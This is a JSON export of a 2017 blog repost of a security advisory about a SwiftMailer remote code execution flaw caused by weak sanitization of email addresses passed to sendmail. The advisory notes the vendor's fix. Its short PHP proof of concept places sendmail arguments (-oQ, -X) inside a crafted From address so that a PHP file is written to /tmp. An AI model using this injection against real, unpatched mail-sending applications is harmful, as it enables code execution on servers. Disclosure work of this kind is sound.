{"id":6275,"date":"2017-01-23T14:07:58","date_gmt":"2017-01-23T22:07:58","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-126\/"},"modified":"2017-01-23T14:07:58","modified_gmt":"2017-01-23T22:07:58","slug":"news-126","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-126\/","title":{"rendered":"SSD Advisory \u2013 SwiftMailer Remote Code Execution"},"content":{"rendered":"<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following report describes a remote code execution vulnerability found in SwiftMailer. The vulnerability allows an attacker injecting <em>sendmail program<\/em> due to insufficient address sanitization. Swift Mailer integrates into any web app written in PHP 5, offering a flexible object-oriented approach to sending emails with a multitude of features<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher Dawid Golunski (https:\/\/legalhackers.com\/) has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vulnerability Details<\/strong><\/p>\n<p>When using SwitMailer to send emails with Sendmail transport, a malicious user might be able to inject arbitrary parameters to <em>sendmail program<\/em> due to insufficient address sanitization. If an attacker can control email headers , he could bypass sanitization by adding additional quote characters within a malicious email address. <\/p>\n<p><strong>Prof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ebd8f8e3466904949\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;?php     require_once &#8216;swiftmailer-5.x\/lib\/swift_required.php&#8217;;      \/\/ Sendmail  \/\/$transport = Swift_SendmailTransport::newInstance(&#8216;\/usr\/sbin\/sendmail -bs&#8217;);    \/\/ Mail  $transport = Swift_MailTransport::newInstance();      \/\/ Create the Mailer using your created Transport  $mailer = Swift_Mailer::newInstance($transport);    \/\/ Create a message  $message = Swift_Message::newInstance(&#8216;Wonderful Subject&#8217;)    -&gt;setFrom(array(&#8216;&#8221;john &#8216; -oQ\/tmp\/ -X\/tmp\/exp.php heh&#8221;@test.com&#8217; =&gt; &#8216;John Doe&#8217;))    -&gt;setTo(array(&#8216;receiver@domain.org&#8217;, &#8216;other@domain.org&#8217; =&gt; &#8216;A name&#8217;))    -&gt;setBody(&#8216;Here is the message itself&#8217;)    ;    \/\/ Send the message  $result = $mailer-&gt;send($message);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0033 seconds] -->  <\/p>\n<p>In this example , -X -oQ parameters would be injected to the sendmail program and write out a \/tmp\/exp.php file<br \/> as a result if the MTA in use was Sendmail. <\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released SwiftMailer version 5.4.5 to address the vulnerability<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2920\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vulnerability Summary The following report describes a remote code execution vulnerability found in SwiftMailer. The vulnerability allows an attacker injecting sendmail program due to insufficient address sanitization. Swift Mailer integrates into any web app written in PHP 5, offering a flexible object-oriented approach to sending emails with a multitude of features Credit An independent security &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2920\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 SwiftMailer Remote Code Execution<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6275","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6275","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6275"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6275\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6275"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6275"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6275"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}